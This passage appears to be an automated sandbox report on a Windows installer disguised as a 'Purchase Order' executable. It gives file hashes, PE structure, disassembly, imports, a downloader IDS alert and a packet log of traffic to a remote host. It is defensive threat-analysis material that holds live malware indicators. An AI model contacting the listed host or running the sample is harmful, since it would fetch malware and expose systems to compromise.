                                            SHA-256:F99C88579EF1BF9BE2A9442D6E0B61BAC01BE74E9EC96A844D3CE0E49E89B889
                                            SHA-512:9DE1E2D1028E9FC4938CA1A4DE274513632319B411E2E1797DAAC80AD1D8C220ABD410612DDA28B6FA58BAD6A591234A675AEA0AE29B0EF75E9776BE91993C1C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):290718
                                            Entropy (8bit):1.2554775771524807
                                            Encrypted:false
                                            SSDEEP:768:tCp+qklylxDqcoTQYGEujA28gHCxgzdobjCp3zxBMpnz4G+KrbwdmCClgE+JQH0/:+DqcWd2ikx8zkwT0sH7FZJ9dmMg9Fb
                                            MD5:C3ACEFE77EA0A60EFDFBC53EF527E6DD
                                            SHA1:84064B562F74D054254FDC6012E83248F4C10DB2
                                            SHA-256:01AB1D43FD91C8715A0FE5D4D3EA6A4DFD0FF6DCA3BFE95DE026B97DD246260B
                                            SHA-512:01B8D1253A15345F35304860BC91AC0EFE9DFD4AE91022326DD1E509C0CC37BE401DE24AA2096B4C2B17D7B965F904C80ECCDB4157C1FD366FA90226DE198D1E
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):484483
                                            Entropy (8bit):1.2566608257372598
                                            Encrypted:false
                                            SSDEEP:1536:k00wcig7ANvjuzHnVWM5DNgLiOavUv9tkj8:Wwci1O1WABgT92j8
                                            MD5:BDF9F6FA5F7851BD46CFAD3859D1D2CA
                                            SHA1:9352199243642CAD95D4870883238F1E06E3D13D
                                            SHA-256:AF12000C4E3E6C57CE444368D50A3E7F737647C0DECD597AAA307F26C0B1BFBF
                                            SHA-512:A99C33BCB4D65AF35FA970BDB84332FCC7C284C2017F135C81DE28EC4D1867E1F341CB6A0DCD1B254E816DD2D435FC469536F9D8779FB10455BAF6846FE1A625
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):281853
                                            Entropy (8bit):7.7902641113783515
                                            Encrypted:false
                                            SSDEEP:6144:qv8q7vHyznD3c0MG0KXtSYaAzhtG1CDta+0kLbYMLezAL1T8K8P/k:lKfqbcX/ySYaAbG1QJLkMMALNbEs
                                            MD5:63B84085F6C377FCB26E75EBD1F83BE4
                                            SHA1:6E6A61DCD1CB093FAC560085E5DC384E3F5C3E66
                                            SHA-256:B63205EDDA324ADC71C16D51D5C4169CEBA89794FAEAF1D0F5809AAEFF256840
                                            SHA-512:F4F43853270F28C405C4FD386094058A5FB9138D237411C60B08FCD97AE176414F8049A0626FD9F02C7571EBAE200AB5FDB4C20896E873B0FDEE23443EFF815C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1434
                                            Entropy (8bit):3.1879819702714474
                                            Encrypted:false
                                            SSDEEP:24:8m7WLgD4/BV02Dejq8wky+pu8wWyjC0ee4jqy:8bgDszhee8w4pu8w3C0eejy
                                            MD5:3E748CD3854E8659E17051729D6DF4EE
                                            SHA1:CB8A77BB37F774F4879FD07B5D7723EA7AD870CE
                                            SHA-256:D1CFCDCB89837792648DC1669AE5F6B1EA4F167B75A16BDE008D98C5278E9F78
                                            SHA-512:319BD36211BF5463C92E3C97C437C14B600FECCD0ABAFBB38BE937160F762BF4D1683F447BFCC6C2CE3C06728118E0011634FD78A7DE36A88B7A8FB1C102C23B
                                            Malicious:false
                                            Reputation:low
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.2...........lensaftalerne.sla.T............................................l.e.n.s.a.f.t.a.l.e.r.n.e...s.l.a... ...X.....\.....\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.P.r.i.n.t.e.r. .S.h.o
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.618058158790601
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File size:724'333 bytes
                                            MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
                                            SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
                                            SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
                                            SHA512:7b39c7eb08b12f947a2f5fb79f91a7c8fb738fa14c2539db55f207754438f5b340d5ae5219ec1ea6861cb72aad32e04d2b701cc6a34c098e0a780db3607be3d2
                                            SSDEEP:12288:d35ol8MJEBhQRtZZbhhLSbWJgU8UFJ6UibZP9/I7TAWWtQnm:d3kJEBORt7b3Oa2Udi9P9yTB0Qnm
                                            TLSH:46F4E061227BCC66F38492B04556E23D8EA6EEC62971C33757F2EF5BB518F723818211
                                            Icon Hash:7b3b5a7232162613
                                            Entrypoint:0x40338f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [00434EECh], eax
                                            je 00007F039D125443h
                                            push ebx
                                            call 00007F039D1286F5h
                                            cmp eax, ebx
                                            je 00007F039D125439h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007F039D12866Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007F039D12541Ch
                                            push 0000000Ah
                                            call 00007F039D1286C8h
                                            push 00000008h
                                            call 00007F039D1286C1h
                                            push 00000006h
                                            mov dword ptr [00434EE4h], eax
                                            call 00007F039D1286B5h
                                            cmp eax, ebx
                                            je 00007F039D125441h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007F039D125439h
                                            or byte ptr [00434EEFh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [00434FB8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0042B208h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x308e8 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x6627 | 0x6800 | 8c030dfed318c62753a7b0d60218279b | False | 0.6642503004807693 | data | 6.452235553722483 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xa000 | 0x2aff8 | 0x600 | 939516377e7577b622eb1ffdc4b5db4a | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata | 0x35000 | 0x2e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x63000 | 0x308e8 | 0x30a00 | f3073287865b6dba616e9c916f34371a | False | 0.4013245099614396 | data | 5.74891499046254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_BITMAP | 0x633e8 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                                            RT_ICON | 0x63750 | 0x10a00 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.25190906954887216
                                            RT_ICON | 0x74150 | 0x9600 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.2941666666666667
                                            RT_ICON | 0x7d750 | 0x7600 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9859970868644068
                                            RT_ICON | 0x84d50 | 0x5600 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.309093386627907
                                            RT_ICON | 0x8a350 | 0x4400 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.35167738970588236
                                            RT_ICON | 0x8e750 | 0x2600 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.38003700657894735
                                            RT_ICON | 0x90d50 | 0x1200 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4377170138888889
                                            RT_ICON | 0x91f50 | 0xa00 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.508203125
                                            RT_ICON | 0x92950 | 0x600 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4524739583333333
                                            RT_DIALOG | 0x92f50 | 0x144 | data | English | United States | 0.5216049382716049
                                            RT_DIALOG | 0x93098 | 0x13c | data | English | United States | 0.5506329113924051
                                            RT_DIALOG | 0x931d8 | 0x100 | data | English | United States | 0.5234375
                                            RT_DIALOG | 0x932d8 | 0x11c | data | English | United States | 0.6056338028169014
                                            RT_DIALOG | 0x933f8 | 0xc4 | data | English | United States | 0.5918367346938775
                                            RT_DIALOG | 0x934c0 | 0x60 | data | English | United States | 0.7291666666666666
                                            RT_GROUP_ICON | 0x93520 | 0x84 | data | English | United States | 0.7803030303030303
                                            RT_MANIFEST | 0x935a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                            DLL | Import
                                            KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-11-18T18:11:16.708256+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49711 | 185.222.57.90 | 80 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Nov 18, 2024 18:11:15.518429041 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:15.523570061 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:15.523704052 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:15.523874044 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:15.528654099 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708092928 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708117962 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708144903 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708256006 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:16.708380938 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708395958 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708466053 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:16.708832979 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708849907 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708863974 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708877087 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708889961 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:16.708892107 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.708910942 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:16.708933115 CET | 49711 | 80 | 192.168.2.8 | 185.222.57.90
                                            Nov 18, 2024 18:11:16.715008974 CET | 80 | 49711 | 185.222.57.90 | 192.168.2.8
                                            Nov 18, 2024 18:11:16.715029001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715101004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715137005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715154886 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715171099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715204954 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715265989 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822288036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822371006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822390079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822427034 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822463036 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823030949 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823048115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823093891 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823123932 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823517084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823533058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823548079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823568106 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823594093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824194908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824212074 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824246883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824270964 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824548006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824564934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824593067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824610949 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937824965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937918901 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937931061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937935114 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938359976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938371897 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938419104 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938836098 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938846111 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938853025 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938916922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.939455986 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.939521074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940246105 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940329075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940390110 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940402031 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940448046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940836906 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940848112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940887928 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.941266060 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941276073 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941315889 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.086539984 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086565971 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086582899 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086817026 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087001085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087018967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087090969 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087404013 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087419987 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087435007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087460041 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087480068 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088102102 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088119030 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088162899 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088557005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088573933 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088591099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088618994 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088654995 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.099957943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100008011 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100178003 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168196917 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168276072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168306112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168333054 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168346882 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168365955 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168581009 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168591976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168623924 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168884039 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168936014 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.169150114 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169161081 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169292927 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171137094 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171148062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171164036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171175003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171185017 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171205997 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171232939 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171466112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171540976 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171680927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171693087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.172089100 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172100067 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172151089 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173605919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173626900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173665047 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173691988 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215079069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215157032 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215161085 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215194941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283687115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283709049 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283778906 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283803940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283845901 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284146070 CET8049711185.222.57.90192.168.2.8
